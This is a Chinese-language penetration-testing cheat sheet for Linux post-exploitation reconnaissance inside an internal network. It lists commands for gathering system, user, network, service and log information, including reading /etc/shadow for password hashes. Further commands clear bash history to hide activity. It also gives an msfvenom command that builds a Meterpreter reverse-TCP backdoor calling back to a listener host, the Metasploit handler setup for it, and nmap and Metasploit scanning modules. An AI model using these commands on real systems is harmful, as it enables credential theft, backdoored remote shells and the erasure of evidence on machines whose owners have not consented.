Linux 内网本机信息收集速查

Linux 内网本机信息收集速查

系统类型

cat /etc/issue
查看系统名称

内核版本

uname –a 查看所有信息

用户

whoami
id
cat /etc/passwd #查看用户列表
cat /etc/shadow #获取用户hash

进程

ps aux 查看进程信息

网卡

/etc/network/interfaces #网卡信息
ifconfig
route #查看路由
arp -a #查看缓存的地址解析情况

服务信息

cat /etc/serivice #查看存在的服务
cat /etc/serices | grep ** #查看对应服务

服务配置

cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf

日志信息

/var/log
/var/log/apache2/access.log #http日志
/var/log/mysql/error.log #mysql日志
/var/log/apt/history.log #apt日志

历史命令

 ~/.bash_history
echo > .bash_history #上述文件类日志删除
history #命令操作历史
history -c #删除

软件信息

dpkg -l #查看安装的软件包
rpm -qa #查看安装的软件包

LINUX后门生成

1.示例指令：

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.73.131 LPORT=4444 -f elf > root/Desktop/shell

2.配置Metasploit，exploit监听

search exploit/hanler  // (exploit/multi/handler：通用有效负载处理程序)
use exploit/multi/handler        // 使用模块
show options         // 配置
set LHOST 192.168.73.131
set payload linux/x86/meterpreter/reverse_tcp         // 设置测试的载荷
exploit            // 监听

nmap扫描：

nmap ‐sP ‐PI 192.168.1.0/24 ‐T4

端口扫描

auxiliary/scanner/portscan
scanner/portscan/ack ACK防火墙扫描
scanner/portscan/ftpbounce FTP跳端口扫描
scanner/portscan/syn SYN端口扫描
scanner/portscan/tcp TCP端口扫描
scanner/portscan/xmas TCP"XMas"端口扫描

SMB扫描

scanner下模块，辅助发现内网存活主机，分别为：

• auxiliary/scanner/discovery/arp_sweep

• auxiliary/scanner/discovery/udp_sweep

• auxiliary/scanner/ftp/ftp_version

• auxiliary/scanner/http/http_version

• auxiliary/scanner/smb/smb_version

• auxiliary/scanner/ssh/ssh_version

• auxiliary/scanner/telnet/telnet_version

• auxiliary/scanner/discovery/udp_probe

• auxiliary/scanner/dns/dns_amp

• auxiliary/scanner/mysql/mysql_version

• auxiliary/scanner/netbios/nbname

• auxiliary/scanner/http/title

• auxiliary/scanner/db2/db2_version

• auxiliary/scanner/portscan/ack

• auxiliary/scanner/portscan/tcp